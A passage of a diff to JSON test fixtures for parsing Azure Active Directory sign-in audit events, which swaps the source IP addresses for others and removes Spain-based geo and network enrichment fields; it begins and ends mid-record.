@@ -924,12 +798,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051497400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:41\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"32e7fb94-6289-4fb4-855b-2ab78671ca4e\",\"InterSystemsId\":\"17f8756c-0bfa-49ad-8537-ada4e17a5f7d\",\"IntraSystemId\":\"1b395e92-5d02-408f-8bfe-139098a95500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970108800Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:41\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"32e7fb94-6289-4fb4-855b-2ab78671ca4e\",\"InterSystemsId\":\"17f8756c-0bfa-49ad-8537-ada4e17a5f7d\",\"IntraSystemId\":\"1b395e92-5d02-408f-8bfe-139098a95500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -968,25 +842,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1000,7 +856,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -1050,7 +906,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -1062,12 +918,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051500500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"7314a65a-f383-40fb-a0c7-00c6c4cfabc0\",\"InterSystemsId\":\"22aac168-9d0d-4c70-b94d-adc337ab7b06\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba18ea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970114500Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"7314a65a-f383-40fb-a0c7-00c6c4cfabc0\",\"InterSystemsId\":\"22aac168-9d0d-4c70-b94d-adc337ab7b06\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba18ea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -1106,25 +962,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1138,7 +976,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -1188,7 +1026,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -1200,12 +1038,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051503600Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"97b494ee-9ba1-4444-b052-3459bdc9eaa5\",\"InterSystemsId\":\"23321532-a321-4c97-909d-9489979777d6\",\"IntraSystemId\":\"1909acba-a486-4ffc-805c-09fb73c0bf00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970120100Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"97b494ee-9ba1-4444-b052-3459bdc9eaa5\",\"InterSystemsId\":\"23321532-a321-4c97-909d-9489979777d6\",\"IntraSystemId\":\"1909acba-a486-4ffc-805c-09fb73c0bf00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -1244,25 +1082,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1276,7 +1096,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -1326,7 +1146,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -1338,12 +1158,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051506500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"5e3ce6c0-2b1f-4285-8d4b-75ee78787346\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"391870e6-1729-40ae-9ebb-51e0652fec9b\",\"InterSystemsId\":\"291fb7ce-4e56-47fd-a78e-4e9012f112ab\",\"IntraSystemId\":\"9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970123900Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"5e3ce6c0-2b1f-4285-8d4b-75ee78787346\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"391870e6-1729-40ae-9ebb-51e0652fec9b\",\"InterSystemsId\":\"291fb7ce-4e56-47fd-a78e-4e9012f112ab\",\"IntraSystemId\":\"9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -1382,25 +1202,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1414,7 +1216,7 @@ "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -1464,7 +1266,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -1476,12 +1278,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051509300Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"a7538fb0-3213-41dc-ab38-1aed787e0cdc\",\"InterSystemsId\":\"30e5377b-31d8-42c2-8170-13404afacde7\",\"IntraSystemId\":\"8971516f-3ef3-4de0-b6b8-ebfae386bc00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970128600Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"a7538fb0-3213-41dc-ab38-1aed787e0cdc\",\"InterSystemsId\":\"30e5377b-31d8-42c2-8170-13404afacde7\",\"IntraSystemId\":\"8971516f-3ef3-4de0-b6b8-ebfae386bc00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -1520,25 +1322,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1552,7 +1336,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -1602,7 +1386,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -1614,12 +1398,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051512500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e2a15fc0-6892-41f5-a41c-e515231cbb0a\",\"InterSystemsId\":\"32e2f533-40fb-4783-8c66-d1bad7e1cc88\",\"IntraSystemId\":\"74ab94ce-8928-4aff-8fa2-a66ad6d41f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970133400Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 